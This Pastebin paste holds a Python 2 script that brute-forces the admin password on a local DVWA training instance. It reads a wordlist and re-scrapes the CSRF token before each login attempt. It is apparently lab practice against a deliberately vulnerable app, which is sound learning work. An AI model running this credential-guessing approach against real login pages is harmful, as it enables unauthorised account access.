Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from sys import argv
- import requests
- from BeautifulSoup import BeautifulSoup as Soup
- #to give our arguments friendly name
- scripts, filename, success_message =argv
- txt = open(filename)
- url = "http://127.0.0.1/DVWA-master/vulnerabilities/brute/index.php"
- cookie = {'security' :'high' , 'PHPSESSID' : 'hnl44rto0q0vhd1eahjsdfml35'}
- s = requests.Session()
- target_page = s.get(url,cookies=cookie)
- def checksuccess(html):
- soup = Soup(html)
- search = soup.findAll(text=success_message)
- print search
- if not search:
- success = False
- else:
- success = True
- return success
- page_source =target_page.text
- soup =Soup(page_source)
- csrf_token = soup.findAll(attrs={"name" : "user_token"})[0].get('value')
- print "**********Your csrf token*************" + repr(csrf_token)
- with open(filename) as f:
- for password in f:
- payload = {"username" : "admin" , "password" : password.strip('\n') , "Login" :"Login" ,"csrf_token" : str(csrf_token)}
- print payload
- r = s.get(url , cookies = cookie , params = payload)
- print r.text
- success = checksuccess(r.text)
- if not success:
- soup =Soup(r.text)
- csrf_token = soup.findAll(attrs={"name" : "user_token"})[0].get('value')
- print "**********Your csrf token*************" + csrf_token
- else:
- print "Your password is" +password
- break
- if not success:
- print "Brute force failed"
Add Comment
Please, Sign In to add comment
